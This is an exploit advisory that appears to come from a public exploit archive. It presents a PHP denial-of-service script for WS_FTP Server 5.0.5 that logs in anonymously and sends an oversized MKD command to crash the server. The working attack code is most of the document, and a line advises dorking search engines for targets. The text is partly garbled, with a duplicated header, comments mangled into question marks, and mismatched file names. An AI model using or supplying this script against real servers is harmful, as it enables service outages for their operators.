WS FTP Server 5.0.5 Denial of Service

=============================================================================================================================================
| # Title : WS FTP =============================================================================================================================================
| # Title : WS FTP Server 5.0.5 - Denied of Service vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://ws-ftp-le.software.informer.com/5.0/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: This code is for WS_FTP Server 5.0.5 and represents a Denial of Service (DoS) attack.

(Related : https://packetstorm.news/files/id/176847/ Linked CVE numbers: ) .

[+] save code as poc.php.

[+] Usage = C:\www>php 2.php 127.0.0.1 21

[+] PayLoad :

<?php
// Exploit Title: WS_FTP Server 5.0.5 - Denied of Service (DoS)

function intro() {
echo "\n-------------------------------------------------------------------------\n";
echo "--------------- [+] WS_FTP Server 5.0.5 - Denied of Service (DoS) ----\n";
echo "----------------------------indoushka------------------------------------\n";
}

function main() {
global $argv;

if (count($argv) < 3) {
echo "Usage: php script.php <ip> <port>\n";
exit(-1);
}

$ip = $argv[1];
$port = $argv[2];

$exploit = str_repeat("\x41", 676); // Fill with A's
$exploit .= "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"; // Exploit payload
$exploit .= str_repeat("\x42", 3000); // Additional padding
$exploit .= "\r\n";

// ????? ??????? ???????
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
echo "[-] Not connected to $ip:$port: $errstr\n";
exit(0);
}

// ????? ??????? ??????
$response = fread($sock, 1024);
echo "Connected => $response\n";

// ????? ?????? ???????
fwrite($sock, "USER anonymous\r\n");
$response = fread($sock, 1024);
echo "Authentication USER: $response\n";

fwrite($sock, "PASS anonymous\r\n");
$response = fread($sock, 1024);
echo "Authentication PASSWORD: $response\n";

// ????? ??????? ???????? ??????
fwrite($sock, "MKD " . $exploit);
$response = fread($sock, 1024);
echo "Exploited: $response\n";

fclose($sock);
}

// ????? ???????
intro();
main();
?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================